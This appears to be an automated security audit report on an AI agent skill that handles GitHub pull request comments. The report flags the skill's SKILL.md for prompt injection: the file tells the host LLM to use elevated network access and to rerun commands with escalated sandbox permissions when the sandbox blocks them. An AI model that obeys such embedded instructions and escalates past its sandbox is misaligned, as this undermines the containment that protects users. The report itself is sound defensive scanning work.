Security Audit
gh-address-comments
github.com/ComposioHQ/awesome-codex-skillsTrust Assessment
gh-address-comments received a trust score of 20/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 2 critical, 2 high, 0 medium, and 1 low severity. Key findings include Arbitrary command execution, Dangerous call: subprocess.run(), Untrusted SKILL.md contains direct instructions for host LLM.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 53/100, indicating areas for improvement.
Last analyzed on February 16, 2026 (commit ccf6204f). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | gh-address-comments/scripts/fetch_comments.py:96 | |
| CRITICAL | Untrusted SKILL.md contains direct instructions for host LLM The `SKILL.md` file, marked as untrusted input, contains explicit instructions for the host LLM, such as 'Run all `gh` commands with elevated network access' and 'If sandboxing blocks `gh auth status`, rerun it with `sandbox_permissions=require_escalated`'. This attempts to manipulate the LLM's behavior and security context based on untrusted content, which is a form of prompt injection. Do not include direct instructions for the host LLM within untrusted skill documentation. If specific permissions or execution parameters are required, they should be declared in a structured manifest or configuration, not as free-form text in the skill description. | LLM | SKILL.md:5 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function '_run'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | gh-address-comments/scripts/fetch_comments.py:96 | |
| HIGH | Skill requests elevated permissions and specific GitHub scopes The skill explicitly requests 'elevated network access' and 'workflow/repo scopes' for the `gh` CLI, and suggests `sandbox_permissions=require_escalated`. While these permissions might be necessary for the skill's intended function (interacting with GitHub PRs), requesting such broad access increases the attack surface if the skill's logic were malicious or if the agent executing it is compromised. Carefully review the minimum necessary permissions required for the skill. If possible, use more granular scopes. Ensure the agent environment strictly enforces these permissions and does not grant more than requested. Explicitly declare required permissions in a structured manifest rather than as free-form text. | LLM | SKILL.md:5 | |
| LOW | Skill processes and outputs sensitive GitHub PR data The `scripts/fetch_comments.py` script fetches and prints a significant amount of potentially sensitive data from GitHub PRs (including comments, review threads, author information, and potentially code snippets within comments) to standard output. While this is the intended functionality of the skill, it represents a large volume of sensitive data being processed and exposed to the calling agent. If the agent or its execution environment is compromised, this data could be exfiltrated or misused. Ensure that the agent environment has robust data handling, logging, and access controls for sensitive outputs. Implement strict access policies for who can invoke this skill and how its output is stored or transmitted. Consider redacting highly sensitive information if not strictly necessary for the skill's subsequent steps. | LLM | scripts/fetch_comments.py:200 |
Scan History
Embed Code
[](https://skillshield.io/report/ef48e71bf111c5e6)
Powered by SkillShield